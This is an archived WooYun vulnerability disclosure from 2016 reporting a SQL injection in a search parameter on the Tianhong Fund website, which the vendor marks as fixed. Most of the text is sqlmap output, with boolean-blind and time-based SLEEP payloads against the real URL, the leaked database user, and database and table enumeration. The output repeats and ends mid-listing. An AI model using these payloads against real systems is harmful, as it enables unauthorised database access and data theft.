天弘基金主站存在MySql注入

发表于 2016年06月20日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2016-0221041

漏洞标题：天弘基金主站存在MySql注入

相关厂商：天弘基金管理有限公司

漏洞作者：丶n

提交时间：2016-06-20 09:04

公开时间：2016-06-21 10:23

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

Tags标签：

漏洞详情

披露状态：

2016-06-20: 细节已通知厂商并且等待厂商处理中
2016-06-21: 厂商已经确认，细节仅向厂商公开
2016-06-21: 厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

rt给个高分吧.

详细说明：

http://www.thfund.com.cn/天弘基金主站http://www.thfund.com.cn//thfund/fundlist/search/api/?word=eword参数存在注入

GET parameter 'word' is vulnerable. Do you want to keep testing the others (if a<br>
ny)? [y/N] y<br>
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) r<br>
equests:<br>
---<br>
Parameter: word (GET)<br>
    Type: boolean-based blind<br>
    Title: AND boolean-based blind - WHERE or HAVING clause<br>
    Payload: word=e%' AND 4468=4468 AND '%'='Type: AND/OR time-based blind<br>
    Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)<br>
    Payload: word=e%' AND (SELECT * FROM (SELECT(SLEEP(5)))scvx) AND '%'='<br>
---<br>
[08:07:03] [INFO] the back-end DBMS is MySQL<br>
web application technology: PHP 5.6.20<br>back-end DBMS: MySQL 5.0.12

GET parameter 'word' is vulnerable. Do you want to keep testing the others (if a

ny)? [y/N] y

sqlmap identified the following injection point(s) with a total of 277 HTTP(s) r

equests:

---

Parameter: word (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: word=e%' AND 4468=4468 AND '%'='Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)

Payload: word=e%' AND (SELECT * FROM (SELECT(SLEEP(5)))scvx) AND '%'='

---

[08:07:03] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.6.20 back-end DBMS: MySQL 5.0.12

current user: '[email protected]\x1f\x08'

1	current user: '[email protected]\x1f\x08'

漏洞证明：

available databases [4]:<br>
[*] information_schema<br>
[*] mysql<br>
[*] performance_schema<br>
[*] thweb

available databases [4]:

[*] information_schema

[*] mysql

[*] performance_schema

[*] thweb

[08:18:46] [INFO] the back-end DBMS is MySQL<br>
web application technology: PHP 5.6.20<br>
back-end DBMS: MySQL 5.0.12<br>
[08:18:46] [INFO] fetching tables for database: 'thweb'<br>
[08:18:46] [INFO] fetching number of tables for database 'thweb'<br>
[08:18:46] [WARNING] running in a single-thread mode. Please consider usage of o<br>
ption '--threads' for faster data retrieval<br>
[08:18:46] [INFO] retrieved: 284<br>
[08:18:54] [INFO] retrieved: a_content_body<br>
[08:20:04] [INFO] retrieved: a_content_category<br>
[08:20:54] [INFO] retrieved: a_w_content<br>
[08:21:46] [INFO] retrieved: a_w_content_1<br>
[08:22:07] [INFO] retrieved: aa_channel_category<br>
[08:23:29] [INFO] retrieved: aa_fundday<br>
[08:24:13] [INFO] retrieved: accesslog<br>
[08:25:00] [INFO] retrieved: actions<br>
[08:25:27] [INFO] retrieved: aliyunoss_file<br>
[08:26:35] [INFO] retrieved: authmap<br>
[08:27:07] [INFO] retrieved: batch<br>
[08:27:36] [INFO] retrieved: b